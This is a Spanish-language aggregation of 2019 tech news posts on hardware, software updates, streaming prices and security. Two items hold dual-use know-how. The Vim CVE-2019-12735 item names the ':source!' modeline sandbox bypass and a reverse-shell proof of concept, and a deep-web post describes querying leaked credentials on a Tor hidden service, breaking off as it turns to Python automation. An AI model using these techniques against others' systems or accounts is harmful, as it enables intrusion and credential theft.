  • Puertos: parece que Upton estaba contento con la selección de puertos de las RPi 3B/3B+, así que podríamos no ver cambios significativos a esos cuatro puertos USB, HDMI, Ethernet y Micro USB para la carga.

Qué esperamos de la Raspberry Pi 4

Por pedir que no quede, ¿no? Bueno, quizás no tanto. Aunque nos gustaría que la futura Raspberry Pi 4 fuera mucho más ambiciosa en todos los apartados, hay que ser coherentes: un ordenador de 35 dólares tiene que hacer muchas concesiones.

Rock Pi Esta Rock Pi 4 es un buen indicativo de lo que podríamos esperar de la Raspberry Pi 4. Puertos USB 3.0, puerto USB-C, puerto M.2 y eMMC, y conector RJ45 GbE "real".

Aún así no está de más tener en cuenta que en estos años la tecnología ha avanzado enormemente y es posible acceder a chips y componentes mucho más avanzados que cuando apareció la primera RPi y hacerlo a costes reducidos. Eso nos hace pensar que nuestra particular "carta a los reyes magos" no es tan difícil de cumplir.

De hecho estamos viendo cómo en el mercado aparecen alternativas que precisamente dan una idea de lo que podríamos esperar en este ámbito. Una de ellas es por ejemplo la Rock Pi 4, basada en una CPI Rockchip RK3399 hexa-core con dos núcleos ARM Cortex-A72 a 1,8 GHz y cuatro núcleos ARM Cortex-A53 a 1,4 GHz. Existen versiones de 1 GB (39 dólares), 2 GB y 4 GB de RAM LPDDR4 (esta última cuesta 75 dólares), y la GPU es una ARM Mali-T860 con soporte DX11, Vulkan 1.0, y Open CL 1.2.

Además tenemos cuatro puertos USB 3.0 (tipo A) e incluso un puerto USB-C, y aunque no hay almacenamiento interno integrado, hay una ranura microSD y, atención, hasta un slot M.2 y otro eMMC que le dan una versatilidad sorprendente a este producto. Desde luego se implementan aquí algunas de las ideas que querríamos ver en una Raspberry Pi 4, pero veamos en resumen qué esperamos de este futuro modelo:

  • Más potencia: es algo confirmado que la CPU cambiará, y aunque aquí esos 28 nm que podrían ser el salto evolutivo podrían limitar algo las cosas, sería interesante contar conuna CPU que aprovechara al máximo esa litografía. Los núcleos Cortex-A55 de los que hablábamos antes parecen una buena opción en cuanto al equilibrio de prestaciones/eficiencia. Sería interesante además contar con soporte nativo para decodificación hardware del códec HEVC, sobre todo teniendo en cuenta que muchos usuarios aprovechan sus Raspberry Pi como Media Centers.
  • Más memoria: si queremos trabajar con más margen de maniobra, la cantidad de memoria RAM sería un apartado a mejorar, y dado que las memorias RAM han bajado de precio, quizás podamos ver al menos 2 GB LPDDR3 o incluso LPDDR4, dependiendo también del procesador elegido.
  • Gigabit Ethernet (de verdad): aunque la última RPi presume de esta conectividad, en realidad está limitada a unos 40 MBps (320 Mbps) de velocidad de transferencia por el uso de un solo canal USB 2.0 que comparten tanto este conector como los cuatro puertos USB de la placa.
  • GPU abierta: una crítica habitual de las actuales Raspberry Pi es que la GPU integrada en el SoC (un chip VideoCore IV dual-core a 400 MHz) no es "abierta", algo que de limita a la CPU e impide que vaya más rápido mediante un sistema de throttling, como explicaba este experto.
  • USB 3.0: el uso de un estándar USB más reciente permitiría avanzar no solo en las transferencias de archivos con unidades externas, sino también en el comportamiento del puerto de red, que podría alcanzar su potencial y no estar capado por el protocol USB como ocurre en la actualidad.
  • Almacenamiento interno: el slot Micro SD es desde luego una opción interesante, pero quizás no sería mala idea integrar un pequeño espacio de almacenamiento, quizás de 8 o 16 GB eMMC, para poder almacenar en ella el sistema operativo sin depender de tarjetas externas. Eso encarecería el precio, así que dudamos que la Raspberry Pi 4 vaya por ese camino. Lo que sí se puede hacer es, como en esa alternativa citada, integrar ranuras M.2 y eMMC para conectar este tipo de soportes y usarlos en lugar de las más lentas tarjetas microSD.
  • Soporte Windows 10: en realidad ya existe soporte parcial para Windows 10 en las Raspberry Pi, pero su funcionamiento es muy limitado y deja claro que hoy por hoy este sistema operativo no es buena opción para usar con una RPi. Aún así sería muy interesante poder aprovechar uno de estos dispositivos como PC de escritorio convencional, algo que ya podemos hacer de hecho con las últimas versiones gracias a distribuciones Linux fantásicas como Raspbian.

También te recomendamos

RGB-Pi: jugar a los videojuegos de antaño en un monitor CRT ya es posible con las Raspberry Pi

Raspberry Pi 3 Model B+, análisis: más potencia y mejor WiFi para un miniPC que sigue asombrando

Ya puedes convertir tu Raspberry Pi en todo un Steam Link: Valve proporciona todo lo necesario

-
La noticia Raspberry Pi 4, todo lo que sabemos hasta ahora (y todo lo que esperamos) fue publicada originalmente en Xataka por Javier Pastor .

20 Jun 18:12

New Exact Globe and Exact Synergy service packs available

by Marcel Thijssen

New Exact Globe and Exact Synergy service packs are available.  The following service packs can be downloaded now:

Note: The new service packs for product update 418 and 263 can currently only be downloaded by customers who already have these product updates.

Before performing an update it is important to check the release notes, changelogs and system requirements of the specific product update/service pack. Click on the links above to view the service pack changelogs per product line and product version. In these changelogs, you can read per product update which improvements are included in the appropriate service pack. You can also find all improvements of previous service packs in the changelog. So you can use a single document for all release information of all service packs per product update.

Release notes and System requirements

For an overview of the release notes and system requirements per product update, see

Installation

In order to obtain a service pack you need to update the software. The method for installing a service pack is similar to a regular update. Instead of the product update that you want to install, you now select the service pack at ‘Release’. For more information how to install an update, please click on the links below:

Keep an eye on the support blog for the availability of the next new service packs.

20 Jun 18:12

Product update DIMONI 330SP2 general available

by Juan Peralvo Vendrell

Update 330 sp2 of DIMONI is generally available from today!

This update, delivered on 19 June 2019, replaces Batch 330 sp1 of 28 March 2019.

You will find the corresponding release notes for this bath following this link (in Spanish): Incorporaciones y correcciones de batch 330 SP2

Please, as always, take into account that it is mandatory to read and check that all technical requirements before updating to this new version: (Requerimientos de sistema para DIMONI 7)

Important notice: Please, be informed that since the next batch of Exact DIMONI, all versions of Microsoft SQL Server 2008 and 2008/R2 will be unsupported for its use with our product.

* To be able to download this batch when using ProductUdater_T9_ES.exe, you will have to indicate batch 332 in the field “version”.

As usual, if you need any kind of information please submit your request to our Support Department.

20 Jun 18:06

Digging into the new features in OpenZFS post-Linux migration

by Jim Salter
Stylized representation of internal computer parts.

Enlarge / There have been some big developments for ZFS in the past several weeks. (credit: Aurich Lawson)

ZFS on Linux 0.8 (ZoL) brought tons of new features and performance improvements when it was released on May 23. They came after Delphix announced that it was migrating its own product to Linux back in March 2018. We'll go over some of the most exciting May features (like ZFS native encryption) here today.

For the full list—including both new features and performance improvements not covered here—you can visit the ZoL 0.8.0 release on Github. (Note that ZoL 0.8.1 was released last week, but since ZFS on Linux follows semantic versioning, it's a bugfix release only.)

Unfortunately for Ubuntu fans, these new features won't show up in Canonical's repositories for quite some time—October 2019's forthcoming interim release, Eoan Ermine, is still showing 0.7.12 in its repos. We can hope that Ubuntu 20.04 LTS (which has yet to be named) will incorporate the 0.8.x branch, but there's no official word so far; if you're running Ubuntu 18.04 (or later) and absolutely cannot wait, the widely-used Jonathon F PPA has 0.8.1 available. Debian has 0.8.0 in its experimental repo, Arch Linux has 0.8.1 in its zfs-dkms AUR package, and Gentoo has 0.8.1 in testing at sys-fs/zfs. Users of other Linux distributions can find instructions for building packages directly from master at https://zfsonlinux.org/.

Read 15 remaining paragraphs | Comments

20 Jun 18:04

Netflix sube de precio: 2 € más al mes para el Plan Premium

by Josh

La subida de precio que Netflix viene realizando en los distintos países donde opera llega a España. Desde hoy el plan Estándar y el Premium suben 1 y 2 € más al mes respectivamente. Solo el plan Básico conserva su precio.

Los nuevos suscriptores pagarán las nuevas tarifas desde hoy, mientras que los clientes actuales recibirán una notificación 30 días antes de que se les aplique la subida.

Plan Actual Nuevo
Básico 7,99 7,99
Estándar 10,99 11,99
Premium 13,99 15,99

https://cincodias.elpais.com/cincodias/2019/06/19/companias/1560967206_862435.html

19 Jun 08:55

Tesla lanza la aplicación Arcade y convierte el volante de sus vehículos en un mando para jugar

by Miguel Jorge

Tesla ha lanzado oficialmente una nueva app para su flota de vehículos. Se trata de Tesla Arcade, y como su nombre indica, va de videojuegos y de convertir el auto en una máquina recreativa.

Read more...

17 Jun 07:06

Cómo solucionar problemas con el GPS en Android

by Eder Ferreño

Android GPS ubicacion

El GPS es una herramienta fundamental en nuestros teléfonos Android. Gracias al mismo podemos hacer uso de aplicaciones de mucha importancia, como Google Maps, que depende de este sensor. Aunque es posible que en alguna ocasión nos encontremos con problemas en su funcionamiento. Esto es algo que puede pasar en diversas ocasiones, lo que nos obliga a tomar acciones en este sentido.

Por suerte, si tenemos problemas con el GPS en Android, hay varias opciones. Existen diversas soluciones con las que poner fin a los mismos, permitiendo que el GPS vuelva a funcionar perfectamente en el teléfono, que es lo que deseamos. Seguro que alguna de ellas os ayuda a solucionar sus fallos.

Activar la ubicación de precisión alta en Android

Precision ubicacion GPS Android

La primera solución a la que podemos recurrir está dentro de los ajustes del teléfono. Es posible que haya ocasiones en las que el GPS no nos da la ubicación adecuada en la que estamos, como podemos ver en Google Maps cuando entramos y vemos el punto azul. Por eso, necesitamos que el GPS nos vaya a dar una mayor precisión en Android. Para ello hay una opción en los ajustes del teléfono.

Se trata de una función llamada servicio de ubicación, que tiene tres niveles. Uno de estos niveles, el más alto, es el de alta precisión. Al tener este modo activado, nos ayudará a que la ubicación con GPS, WiFi, Bluetooth o redes móviles sea mucho más precisa. Lo que nos dará un mejor funcionamiento en este sentido. Justamente lo que estábamos buscando.

La manera de activar esto en el teléfono es sencilla. Tenemos que entrar en los ajustes en Android y entrar luego en el apartado de Seguridad y ubicación (el nombre puede cambiar en algunos modelos). Luego en el apartado de ubicación nos fijamos en precisión de la ubicación de Google. Comprobamos que esté activada y seleccionamos el modo de alta precisión.

Artículo relacionado:
¿Cuáles son los sensores más importantes de tu teléfono Android?

Calibrar en Google Maps

En Google Maps podemos calibrar la brújula, que en muchos casos nos da una información incorrecta, por fallos en el GPS. Es una forma de usar la aplicación de navegación de mejor manera, además de que es especialmente fácil de usar en todo momento. De esta manera, podemos tener una posible solución ante este fallo, en el que se nos da una información que no es precisa cuando estamos usando la aplicación en nuestro teléfono Android. Lo que tenemos que hacer en este caso es hacer tres veces un ocho en el aire sujetando el teléfono.

Calibrar sensores

GPS Android

Es habitual que en algún momento haya fallos con los sensores de nuestro teléfono Android. Puede pasar y no es algo que sea especialmente grave, pero que podemos solucionar en todo momento. Ya que tenemos la posibilidad de recalibrar los sensores de nuestro smartphone, permitiendo que vuelvan a funcionar con normalidad de forma sencilla. Esto es algo que os hemos mostrado ya en el pasado, para lo que podemos usar aplicaciones.

De modo que si calibramos los sensores en Android de nuevo, lo más normal es que estos problemas con el GPS se hayan terminado, haciendo que vaya a funcionar de nuevo con normalidad. Además, tenemos aplicaciones destinadas a calibrar específicamente el GPS de nuestro teléfono, por lo que podemos usar una de ellas, si queremos que centrarnos únicamente en este caso. Hay una app de mucha utilidad en este caso, llamada GPS Status & Toolbox. Se puede descargar gratis desde la Play Store, en el enlace a continuación:

GPS Status & Toolbox (Free, Google Play) →

Esta aplicación se encarga de escanear el GPS de nuestro smartphone Android, para comprobar cuál es el origen del fallo que hay en el mismo. Además, tiene una serie de herramientas que nos son de ayuda para terminar con dichos problemas. De modo que lo normal es que cuando la hayamos usado, analizado y aplicado una solución, todo vaya a funcionar a la perfección de nuevo. Una app fácil de usar, que podemos descargar sin tener que pagar dinero.

14 Jun 07:00

Hackean el robot de cocina de Lild: descubren que tiene un micrófono oculto y cuenta con el desactualizado Android 6.0

by (abc)
El robot de cocina Monsieur Cuisine Connect de Lidl (359 euros) es uno de los más demandados en el mercado. El recién lanzamiento en Francia de la nueva versión fue, de hecho, una auténtica locura. Diseñado en Alemania y producido en China, dispone de una pantalla táctil de 7 pulgadas y se puede conectar a la red wifi del hogar para descargar recetas de forma gratuita. Por tanto, os recordamos lo que siempre dicen los expertos en ciberseguridad: «Todo aparato conectado a la Red es susceptible de ser hackeado». Dos jóvenes franceses aficionados a la informática, Alexis Viguié y Adrien Albisetti, han «destripado» este dispositivo, descubriendo varios elementos curiosos en su funcionamiento, tal y como informa la publicación francesa «Numerama». Entre otras cosas, han descubierto «la existencia de un micrófono secreto inactivo, que podría ser vulnerable a un ataque». La idea «destripar» a Monsieur Cuisine surgió de forma espontánea. Según Alexis Viguié, un amigo le retó a ejecutar «Doom» en el popular robot de cocina. «Doom» es un videojuego muy famoso que se puede instalar en multitud de dispositivos que nunca han sido diseñados para ellos. Los amantes de este videojuego lo han instalado donde no te puedes imaginar: cajeros automáticos, en un iPod, relojes, etc. Después de unos minutos, los dos jóvenes se percataron de que la pantalla táctil se ejecuta sobre Android 6.0. Decidieron, así, «hackearla»: desbloquearon la interfaz del robot de cocina y usarla como si fuera una tableta. El resultado es que consiguen jugar a «Doom» en la pantalla del robot de cocina o ejecutar aplicaciones que funcionan a la percepción, como Youtube, tal y como demuestran en el vídeo que han publicado en «Reddit». «Pero un detalle llamó nuestra atención», aseguran. Fue el micrófono, un elemento que descubrieron a pesar de que «no se menciona en ningún lugar su existencia, ni en el sitio web oficial, ni en las instrucciones de uso que consultamos. Aún así, está en perfecto estado de funcionamiento». También cuenta con un altavoz. La incógnita del altavoz y micrófono Ya el alemán Gauster Haus demostró en 2018, a través de un vídeo publicado en Youtube, que el robot de cocina tenía un micrófono, a la derecha, y un altavoz, a la izquierda. En la última versión del robot de cocina de Lidl, los dos jóvenes indican que «el micrófono es similar» al de la versión que «destripó» Haus, «pero el altavoz parece más grande». Ambos componentes se ven a la perfección observando a Monsieur Cuisine. Altavoz, a la izquierda, y micrófono, a la derecha - Numerama La pregunta que se hacen los jóvenes es clara: ¿Planea Lidl permitir el control de voz en un futuro cercano? La compañía ha elegido «voluntariamente» situar ambos componentes, sin explicárselo al consumidor, a pesar de que parece estar desactivado. «El hecho de tener un micrófono sin notificar a los usuarios ya es un problema en sí mismo», recuerda «Numerama». Basta con recordar el caso de Google, que dotó a su dispositivo de seguridad Nest Secure, lanzado en 2017, de un micrófono sin informar a los usuarios. Michel Biero, responsable de marketing de Lidl en Francia, se ha postulado para defender a la compañía. Aunque en una primera versión que ofreció a «Numerama» aseguró «no estar al tanto de la presencia del micrófono», después reconoció que existía porque esperaban que Monsieur Cuisine «fuera controlable por voz y posiblemente por Alexa (...) Dejamos el micrófono pero está completamente inactivo y no es posible que lo activemos de forma remota. Lidl no quiere y no puede acceder a él». Pero, tal y como recuerda la publicación, «es técnicamente posible que pueda tener acceso a este micrófono, como (la compañía) admite, si usara una actualización automática», algo que puede hacer porque Lidl así lo especifica en sus condiciones de uso. En tal caso, «la activación se actualizará y el cliente podrá optar o no por esta función», aunque no aclara cómo informará al consumidor de que dicha opción está disponible. El obsoleto sistema operativo «Pero la existencia de este micrófono no mencionado podría tener consecuencias mucho más graves en caso de intento de pirateo del dispositivo. Como han observado Alexis Viguié y Adrien Albisetti, resulta que Monsieur Cuisine funciona con una versión antigua de Android, la 6.0, cuyos parches de seguridad datan de 2017, lo que hace que el dispositivo sea vulnerable a los ataques», añade la publicación. Y es que Android 6.0 es una versión que Google tiene abandonada ya (data del 2015) y no actualiza desde octubre de 2017. Teniendo en cuenta que «cada mes, Google lanza un nuevo parche de seguridad que corrige docenas de errores de seguridad» que no solo afectan al software, sino a componentes de terceros, la exposición es grave. De hecho, la versión de 2018 del robot de cocina de Lidl lleva también Android 6.0. «¿Por qué un producto de 2018 está equipado con esta versión antigua de Android que, además, no está asegurado?», preguntan los jóvenes. «No había necesidad de una tableta más sofisticada para que el robot funcione», explica el responsable de Lidl, ignorando la grave vulnerabilidad y falta de seguridad de su producto. Tal y como explica la Oficina de Seguridad del Internauta (OSI), las actualizaciones, ya sean de aplicaciones o de sistema operativo, «son añadidos o modificaciones cuya misión es mejorar tanto aspectos de funcionalidad como de seguridad». Por ello, «tenemos que tenerlas instalados en nuestros dispositivos». En el caso de no mantener los dispositivos al día, «nos exponemos a todo tipo de riesgos: robo de información, pérdida de privacidad, perjuicio económico, suplantación de identidad, etc. Las vulnerabilidades «pueden ser aprovechadas por ciberdelincuentes para infectarnos y llevar a cabo actividades maliciosas».
11 Jun 15:47

Una vulnerabilidad en Vim permite hackear Linux con simplemente abrir un archivo en el editor

by Gabriela González

Una vulnerabilidad en Vim permite hackear Linux con simplemente abrir un archivo en el editor

El investigador de seguridad Armin Razmjou ha descubierto una grave vulnerabilidad en los conocidos editores de texto presentes en la mayoría de distribuciones Linux: Vim y Neovim.

La vulnerabilidad CVE-2019-12735 tiene una puntuación alta puesto que permite a un atacante ejecutar comandos en el sistema operativo de forma remota y tomar control del mismo. De hecho, utilizando un comando es posible saltarse la protección del sandbox de Vim.

Vim es legendario como editor que se usa desde la línea de comandos y un favorito de los programadores. Neovim es un fork que básicamente busca ofrecer una opción hipertextensible que solucione muchos de los problemas que algunos tienen con el Vim clásico. Ambos están expuestos a esta vulnerabilidad porque manejan las 'modelines' de la misma forma.

La culpa es de las modelines

Neovim Terminal Neovim terminal

Si un atacante crea un archivo especial utilizando Vim o Neovim, bastaría solo con que lo abras en cualquiera de los editores para que este pueda hackear tu distribución Linux ejecutando comandos arbitrarios de forma remota.

Este fallo en la ejecución de código de Vim tiene que ver específicamente en la forma en la que Vim maneja las 'modelines', una función que viene activa por defecto y que ofrecen al usuario una forma de establecer variables específicas para un archivo, incluso un simple .txt.

Con una 'modeline' se pueden aplicar un conjunto de preferencias personalizadas cerca del inicio y el final de las lineas de un documento. Y aunque Vim utiliza un sandbox para aislar el editor y evitar que se ejecute una 'modeline' con expresiones inseguras, el investigador ha descubierto que usando el comando ":source!" se puede saltar el sandbox.

Esto permite leer y ejecutar los comandos de un archivo dado como si se escribiera manualmente, ejecutándolos después de que se deja el sandbox.

Razmjou publicó dos pruebas de concepto en su página de GitHub. Una de ellas ofrece un ejemplo de un ataque en la vida real en la que el atacante logra ejecutar un reverse shell inmediatamente que el usuario abre el archivo, es decir, el atacante logra ejecutar su código para tomar control de la máquina y además establece una conexión.

Es recomendado aplicar los parches para Vim en la versión 8.1.1365, y para Neovim en la versión v0.3.6. Además de esto, se recomienda desactivar las 'modelines' en vimrc, usar el plugin securemodelines, o desactivar modelineexpr para no permitir expresiones en las 'modelines'.

También te recomendamos

Windows 10 tendrá un modo ‘sandbox’ para probar ejecutables en un ambiente aislado y seguro

Un bug en los procesadores Intel permite a un atacante alterar o borrar partes de la BIOS

Google desvela una vulnerabilidad en Windows 10 S porque Microsoft se vuelve a quedar sin tiempo para solucionarla

-
La noticia Una vulnerabilidad en Vim permite hackear Linux con simplemente abrir un archivo en el editor fue publicada originalmente en Genbeta por Gabriela González .

11 Jun 09:21

Galaxy Xcover 4S: Un móvil que resiste en todas las situaciones

by Eder Ferreño

Galaxy Xcover 4S

Samsung nos está dejando con bastantes lanzamientos estas últimas semanas. La marca coreana ha lanzado sus nuevas tablets en España esta pasada semana. Además, hoy mismo se presenta el M40 en un evento en India. Mientras tanto, la firma nos deja con un nuevo teléfono, un modelo rugged en este caso. Han presentado ya el Galaxy Xcover 4S de manera oficial.

Este Galaxy Xcover 4S se presenta como un smartphone que lo aguanta todo. Un modelo rugged, pensado para los más aventureros, que saben que este tipo de modelos resistente a todo tipo de situaciones sin dificultad. Samsung nos deja ahora con un nuevo modelo en esta gama.

Muchas marcas en Android apuestan por los teléfonos ruggerizados, pensados para resistir en cualquier situación. Marcas como Samsung o LG nos suelen dejar también con teléfonos con certificación militar. Por lo que los modelos resistentes son algo que tiene demanda en el mercado actual.

Artículo relacionado:
El Galaxy Fold tiene una nueva fecha de lanzamiento

Especificaciones Galaxy Xcover 4S

Galaxy Xcover 4S

A nivel técnico nos dejan con un modelo de gama baja-media bastante simple, pero cumplidor. En este tipo de teléfonos lo importante es la resistencia, de modo que lo vayamos a poder usar en todo tipo de situaciones. Por suerte, en este Samsung Galaxy Xcover 4S es algo que se cumple con creces. Estas son las especificaciones del teléfono:

  • Pantalla: TFT de 5 pulgadas con resolución de 1280 x 720 píxeles
  • Procesador: Samsung Exynos 7885
  • RAM: 3 GB
  • Almacenamiento interno: 32 GB (Ampliable hasta 512 GB con microSD)
  • Cámara trasera: 16 MP con apertura f/1.7 y LED Flash
  • Cámara frontal: 5 MP con apertura f/2.2
  • Batería: 2.800 mAh
  • Sistema operativo: Android One Pie
  • Conectividad: Dual SIM, WiFi 802.11 /ac, GPS, GLONASS, Bluetooth, USB
  • Otros: IP68, Resistencia militar, NFC
  • Dimensiones: 145,9 x 73,1 x 9,7 mm

Nos encontramos ante un teléfono sencillo, donde todavía tenemos botones bajo la pantalla. Esto es algo ya poco habitual en el mercado, pero que la marca coreana ha recuperado en este Galaxy Xcover 4S. La pantalla del teléfono es pequeña en este caso, de apenas 5 pulgadas de tamaño, pero cumple en este sentido. Nos encontramos con una única combinación de RAM y almacenamiento interno. La batería de este modelo tiene una capacidad de 2.800 mAh, que parecen insuficientes, aunque en combinación con su pantalla y procesador, no da la sensación de ser un teléfono que vaya a consumir demasiado.

Al ser un smartphone rugged, la resistencia es el aspecto clave del mismo. En este campo, el teléfono cuenta con la certificación militar que ya hemos visto en otros modelos, que es lo que garantiza esto. Esto es algo que nos ayuda a saber que este Galaxy Xcover 4S va a resistir todo tipo de situaciones sin demasiados problemas. Además de dicha certificación, el teléfono cuenta con la certificación IP68, de resistencia ante agua y polvo, que es otra habitual en este tipo de teléfonos. Otra sorpresa en el modelo es la presencia de NFC, para hacer pagos móviles con el mismo.

Precio y lanzamiento

Galaxy Xcover 4S

Samsung ha presentado ya este Galaxy Xcover 4S de manera oficial en Italia, donde se va a poner a la venta este mes de julio. De momento no hay ninguna información sobre su lanzamiento en otros países, aunque es de esperar que se lance también en España por las mismas fechas. Pero tendremos que esperar a que sea la propia empresa la que nos de más pistas sobre este lanzamiento. Probablemente estos próximos días haya más datos al respecto. Pero seguramente se lance en julio en España.

En cuanto al precio, tenemos el precio que este modelo tendrá en Italia, que probablemente vaya a ser el mismo en España. Se espera que este Galaxy Xcover 4S vaya a costar 299,99 euros. Por lo que puede resultar algo caro, pero se paga sobre todo sobre la gran resistencia que este teléfono nos va a proporcionar en todo momento. Esperamos tener datos dentro de poco sobre el lanzamiento del teléfono en España, que debería ser pronto. ¿Qué pensáis de este modelo rugged de la marca coreana?

10 Jun 10:24

Termius un cliente SSH con cifrado de end-to-end multiplataforma

by David Naranjo

termius-p-

Termius es un cliente SSH multiplataforma, que se ejecuta en computadoras de escritorio y dispositivos móviles. Este cliente SSH permite organizar hosts en grupos. Los grupos permiten compartir la configuración, aunque cada host puede tener sus propias preferencias.

Estos datos, junto con el historial de conexiones y comandos, se sincronizan de forma segura en todos los dispositivos.

Sus desarrolladores lo han introducido como un cliente SSH que utiliza cifrado de extremo a extremo para garantizar la seguridad de los datos del usuario.

En otras palabras, la diferencia con otros clientes SSH sería que, además de ser una solución completa de línea de comandos, Termius sincroniza los datos de un dispositivo a otro mediante el cifrado de extremo a extremo.

Sobre Termius

Termius es multiplataforma, lo que significa que puede acceder de forma segura a dispositivos Linux o IoT un dispositivo móvil, Android o iOS, así como desde cualquier computadora con Windows, Mac OS o Linux.

Según su documentación, su compatibilidad con Mosh le confiere una excelente confiabilidad en conexiones de alta latencia que cambian constantemente.

Mosh (o Shell móvil) es un software de red gratuito para una conexión de tipo terminal a un servidor remoto. Se posiciona como una alternativa al SSH.

A diferencia de este último, Mosh es capaz de manejar conexiones intermitentes y de itinerancia y proporciona un mecanismo de eco inteligente para que los comandos incautados ahorren ancho de banda.

Es más robusto y más adecuado para conexiones de red deficientes (baja velocidad o intermitentes), especialmente en redes Wi-Fi, 3G o de larga distancia.

De acuerdo con sus cofundadores, DevOps, los administradores de sistemas y los ingenieros de redes aprovechan Termius porque pueden mantener toda la información que necesitan para administrar sus servidores en un lugar seguro, como extractos, cadenas de conexión, historial, etc.

Su idea es reconstruir la experiencia de la línea de comandos alrededor del ingeniero, no alrededor del mainframe donde todo comenzó. Por ejemplo, Termius ayudará a los ingenieros a almacenar con seguridad información sobre sus servidores, comandos de Shell y registros de terminales y más.

Esta información será accesible desde cualquier dispositivo y se utilizará para mejorar la productividad, por ejemplo, autocompletar comandos en el terminal.

También explican que Termius viene a resolver, por ejemplo, los problemas de compilar un proyecto de C ++ en un teléfono inteligente.

Según ellos, era difícil justificar el pago de $ 10 USD para iSSH (un cliente SSH para teléfonos iOS) para un caso de uso tan menor.

“Los clientes de SSH gratuitos de la App Store eran feos o tenían anuncios en la ventana de la terminal. Se pensó que un cliente SSH básico con el terminal debería estar disponible en todas las plataformas de forma gratuita y sin publicidad.

SSH es tan universal como el correo electrónico y la mayoría de los sistemas operativos tienen al menos un cliente de correo electrónico básico gratuito.”, insinuaron.

Termius se lanzó por primera vez para iOS y Android antes de expandir su soporte a otras plataformas. Dicho esto, dicen, algunos usuarios inicialmente dejaron de usar la aplicación móvil porque era difícil mantener la información actualizada en el dispositivo móvil.

Como resultado, un cliente de SSH móvil autónomo fue inútil para ellos y tuvieron que ir a su oficina.

Para resolver el problema, era necesario inclinarse hacia una aplicación para la oficina y agregar una opción de sincronización cifrada. ”

Nos dimos cuenta de que si agregáramos una aplicación de escritorio y una sincronización segura con el cifrado de extremo a extremo, todos los datos se mantendrían actualizados en todos los dispositivos y los usuarios podrían confiar en las aplicaciones móviles”, explicaron sus creadores.

¿Como instalar Termius en Linux?

Para quienes estén interesados en poder instalar este cliente SSH en sus sistemas, podrán hacerlo con ayuda de los paquetes Snap.

El único requisito es que su sistema pueda admitir el soporte de los paquetes Snap. Para realizar la instalación solo tienen que abrir una terminal y en ella teclear:

sudo snap install termius-app

Finalmente para poder sincronizar la información tendrán que crear una cuenta en el siguiente enlace.

El artículo Termius un cliente SSH con cifrado de end-to-end multiplataforma aparece primero en Termius un cliente SSH con cifrado de end-to-end multiplataforma.

10 Jun 08:27

Hat.sh: cifra cualquier archivo gratis y rápido desde el navegador, de forma segura y sin servidores

by Gabriela González

Hat.sh: cifra cualquier archivo gratis y rápido desde el navegador, de forma segura y sin servidores

Hat.sh es una simple aplicación web escrita en JavaScript que ofrece cifrado seguro de archivos desde una pestaña de tu navegador. La utilidad es completamente serverless, es decir, nada se sube a ningún servidor y todo se hace de forma local desde tu ordenador.

Básicamente, te ofrece una solución extremadamente simple y rápida de cifrar cualquier tipo de archivo sin importar el tamaño, y desde la mayoría de navegadores modernos populares tanto en el escritorio como en el móvil.

"The Hat project" utiliza el algoritmo AES-256-GCM a través de la WebCryptoAPI de tu navegador para cifrar los archivos, y fue creada utilizando la documentación de WebCrypto.

Su código fuente está disponible en GitHub bajo una licencia MIT, y si quieres usarlo offline, la aplicación es multiplataforma y está disponible para descargar en macOS y Windows, solo que tienes que descargar y clonar el repositorio tú mismo.

Cómo se usa

Esta es la parte más sencilla, lo único que tienes que hacer es entrar en Hat.sh, elegir un archivo desde tu ordenador presionando el botón "Browse", e ingresar una llave de cifrado en el cajón inferior.

Puedes escribir tu propia llave de cifrado, o puedes generar una automáticamente con la misma aplicación. La estimación de la fortaleza de tu llave de cifrado se hace usando zxcvbn. Sea como sea, deberás tener la clave para poder descifrar el archivo.

Notarás que el proceso es extremadamente rápido sin importar el tamaño de tu archivo, y es que por una parte no has tenido que subir nada a ningún servidor, y por otra, Hat.sh solo ejecuta una porción pequeña de código.

Para descifrar un archivo solo tienes que seguir el mismo proceso, la única diferencia es que esta vez tendrás que presionar el botón "Decrypt" en lugar de "Encrypt".

Hat.sh es compatible con Chrome en Windows, macOS, Linux, iOS y Android; Firefox en Windows, macOS, y Linux; Safari en iOS y macOS; Internet Explorer y Edge en Windows.

También te recomendamos

15 geniales aplicaciones web completamente gratis que puedes usar en cualquier sistema operativo

Ocho preguntas que nos hacemos sobre las promesas de Zuckerberg en cifrado y privacidad en Facebook

El malware para hospitales puede hacer creer a los médicos que pacientes sanos tienen cáncer (y viceversa)

-
La noticia Hat.sh: cifra cualquier archivo gratis y rápido desde el navegador, de forma segura y sin servidores fue publicada originalmente en Genbeta por Gabriela González .

10 Jun 06:38

Deep Web: Cómo buscar tus contraseñas en las "profundidades" de Internet

by noreply@blogger.com (Chema Alonso)
Seguramente todo el mundo ha oído hablar de la Deep Web, donde todo lo que existe en el mundo digital - o casi - se dice que se puede encontrar. Claro está, hay que hacerlo buscando correctamente, pero sin buscadores tradicionales, ya que mucho del contenido es contenido no indexado que si no sería "Sufrace Web". En este artículo, nos vamos a sumergir un poco en la DarkNet, en una página que nos permite obtener credenciales de direcciones de correo electrónico que se han visto comprometidas a lo largo del tiempo.

Figura 1: Deep Web: Cómo buscar tus contraseñas en las "profundidades" de Internet

Si quieres conocer mucho mejor cómo funcionan las redes de la Deep Web, como TOR, FreeNET o I2P, y cuáles son los principales beneficios para la privacidad y el anonimato, ya sabes que en 0xWord Daniel Echeverri escribió un libro largo y explicativo sobre este tema.

Figura 2: Deep Web: Privacidad y Anonimato

La página de la que vamos a echar mano es una web publicada como Hidden Service en un dominio .onion. Esto nos indica que estamos en la red TOR, si intentamos acceder a través de un navegador común, obtendremos un mensaje como el que sigue:
“No se puede acceder a este sitio web”
Ya que no encuentra la dirección IP del servidor asociado a ese TLD. Sin embargo, si tiramos a través de la red de TOR podremos hacer nuestras consultas y verificar si nuestro correo regala “contraseñas” a los cibercriminales. En la imagen siguiente se puede ver el resultado usando una dirección de e-mail falsa.

Figura 3: Consulta de dirección de e-mail en el Hidden Service de TOR

Nada complicado. Todos podemos llegar a este Hidden Service y, si tu contraseña sale a relucir, haz un cambio de inmediato, y asegúrate de tener un Segundo Factor de Autenticación. Ahora bien, ¿podemos hacer la consulta a través de un script que nos sea útil para un pentesting usando Python?

Figura 4: Libros de Python para Pentesters y Hacking con Python de Daniel Echeverri

De manera “convencional” no, ya que nos devolverá el siguiente error: "Failed to establish a new connection: [Errno 11001] getaddrinfo failed'. Vamos a ver cómo hacemos para que las peticiones de nuestro script en Python puedan ser enviadas a la red TOR.

Automatizando scripts con Python en la red TOR

